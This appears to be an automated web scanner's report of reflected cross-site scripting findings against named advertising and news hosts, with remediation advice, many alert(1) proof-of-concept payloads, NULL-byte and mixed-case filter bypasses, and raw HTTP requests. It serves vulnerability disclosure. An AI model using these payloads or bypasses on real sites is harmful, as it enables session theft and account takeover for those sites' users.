Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c985d"-alert(1)-"bb754d1e1d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cafc2"-alert(1)-"32fb95a1715 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c50"-alert(1)-"5b17dd630f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62241"-alert(1)-"41856d58a51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4aa89"-alert(1)-"2c267392a85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8be0e"-alert(1)-"eeace66c30c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c701"-alert(1)-"60f51ac54d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7ad6"-alert(1)-"ce67ab6b923 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5431"-alert(1)-"ecc4042015f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99290"-alert(1)-"21295270dc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d892"-alert(1)-"2c2267ee8cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92a3d"-alert(1)-"387ea09717f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ecc"-alert(1)-"f59af658d37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c8e1"-alert(1)-"d188184ba9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ccb4"-alert(1)-"0a1eef0a385 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 125aa"-alert(1)-"41b87e2863c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aca3d"-alert(1)-"7d2af4878a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a006"-alert(1)-"331193e93c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb484"-alert(1)-"431fc0a02e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90f43"-alert(1)-"db3b6157138 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2be31"-alert(1)-"ccced9a65eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6078"-alert(1)-"429fe3342d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec8f8"-alert(1)-"c68db13757c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 842ea"-alert(1)-"425ec9af40e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdc73"-alert(1)-"5ad89bb03db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfbe0"-alert(1)-"d8ecb12d6ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5879a"-alert(1)-"bb7dfa01818 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0dfd"-alert(1)-"b09ef200713 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c86b2"-alert(1)-"5d2c48ff9c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95327"-alert(1)-"3f30dcc58fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15a8c"-alert(1)-"a34ffbae454 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fac16"-alert(1)-"9688e994782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99357"-alert(1)-"4ee7bb08df1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5176c"-alert(1)-"bf7c2c63e04 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the refcat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43cc3"style%3d"x%3aexpression(alert(1))"00b4de691d2 was submitted in the refcat parameter. This input was echoed as 43cc3"style="x:expression(alert(1))"00b4de691d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the refcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fb07'%3balert(1)//4d2d623eb2a was submitted in the refcat parameter. This input was echoed as 3fb07';alert(1)//4d2d623eb2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the auto_ctl_invite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2a9f'-alert(1)-'f17657d39c9 was submitted in the auto_ctl_invite parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16939'-alert(1)-'633f27d02c8 was submitted in the lang parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:34:28 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: LP=1315398868; expires=Sun, 11 Sep 2011 16:34:28 GMT; path=/; domain=.questionmarket.com
Content-Length: 2702
Content-Type: text/html

(function(){ var d=document,w=window,dle;
function ff(){ var p=w.parent,r;
while (p != top) { try { if (p.location.host == w.location.host) r = p.document.referrer; } catch (e) { }
p = p.paren ...[SNIP]... t; if (!df.DL_already_ran){ dle=d.createElement('script'); dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=16939'-alert(1)-'633f27d02c8&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7'; ...[SNIP]...
The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78a38'-alert(1)-'cf5908a5123 was submitted in the loc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.40. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://amch.questionmarket.com
Path: /adscgen/dynamiclink.js.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5433'-alert(1)-'ded7162e703 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fee25'-alert(1)-'65069f0c0a8 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the protocol request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d00ae'%3balert(1)//5eba82bd623 was submitted in the protocol parameter. This input was echoed as d00ae';alert(1)//5eba82bd623 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %005cfe5'-alert(1)-'0089328db21 was submitted in the site parameter. This input was echoed as 5cfe5'-alert(1)-'0089328db21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8cde5<script>alert(1)</script>0db736188ef was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload a5dcf<script>alert(1)</script>661bf37752d was submitted in the &callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 326f0<script>alert(1)</script>dc7df702c62 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ac888<a>8f8f392bd8e was submitted in the id parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /viapi?action=pixel&id=eb2039789ac888<a>8f8f392bd8e HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/RGA/iview/350415430/direct/01/6854533?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7b/3/0/%2a/b%3B245733871%3B0-0%3B0%3B46249204%3B3454-728/90%3B43845580/43863367/1%3B%3B%7Eokv%3D%3B%3Bpage%3DuberBannerAd%3Bmsrc%3DBOL_hpp_highlight_top%3B%3Bmc%3D0%3Btile%3D8%3Bsz%3D728x90%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 71e1a<a>9cf018d0a7 was submitted in the name parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the name request parameter is copied into the XML document as plain text between tags. The payload 17115<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>bf89301b6a1 was submitted in the name parameter. This input was echoed as 17115<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>bf89301b6a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of the value request parameter is copied into the XML document as plain text between tags. The payload f1146<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>ac628cc6951 was submitted in the value parameter. This input was echoed as f1146<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>ac628cc6951 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of the absolutePath request parameter is copied into the HTML document as plain text between tags. The payload 7f1db<ScRiPt>alert(1)</ScRiPt>9aedcc2b856 was submitted in the absolutePath parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /cdssvco/file/v2/Files?absolutePath=%2Fdjscript%2Fbucket%2FNA_WSJ_PUB%2Fpage%2F0_0_WG_HeaderOne%2Fprovided%2Fj_global_slim%2Fversion%2Fvblg31_201183.js7f1db<ScRiPt>alert(1)</ScRiPt>9aedcc2b856&absolutePath=%2Fpublic%2Fpage%2FNA_WSJ_PUB%3A0_0_WG_HeaderOne-none-vblg31_201183.html&c=dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne HTTP/1.1
Host: cc.wsj.net
Proxy-Connection: keep-alive
Referer: http://blogs.wsj.com/digits/2011/09/06/yahoos-statement-on-carol-bartzs-removal-as-ceo/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Restlet-Framework/2.0.3
Accept-Ranges: bytes
Vary: Accept-Charset,Accept-Encoding,Accept-Language,Accept
Content-Type: application/x-javascript
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
X-DEBUG-EMGSESSIONID: NULL
Date: Wed, 07 Sep 2011 12:21:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 227453
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 38b7c<ScRiPt>alert(1)</ScRiPt>0566c56b2fc was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /cdssvco/file/v2/Files?absolutePath=%2Fdjscript%2Fbucket%2FNA_WSJ_PUB%2Fpage%2F0_0_WG_HeaderOne%2Fprovided%2Fj_global_slim%2Fversion%2Fvblg31_201183.js&absolutePath=%2Fpublic%2Fpage%2FNA_WSJ_PUB%3A0_0_WG_HeaderOne-none-vblg31_201183.html&c=dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne38b7c<ScRiPt>alert(1)</ScRiPt>0566c56b2fc HTTP/1.1
Host: cc.wsj.net
Proxy-Connection: keep-alive
Referer: http://blogs.wsj.com/digits/2011/09/06/yahoos-statement-on-carol-bartzs-removal-as-ceo/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Restlet-Framework/2.0.3
Accept-Ranges: bytes
Vary: Accept-Charset,Accept-Encoding,Accept-Language,Accept
Content-Type: application/x-javascript
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
X-DEBUG-EMGSESSIONID: NULL
Date: Wed, 07 Sep 2011 12:21:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 227453
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 19297<script>alert(1)</script>711c5156631 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44b8b'%3b0e868ba3cf5 was submitted in the REST URL parameter 2. This input was echoed as 44b8b';0e868ba3cf5 in the application's response.
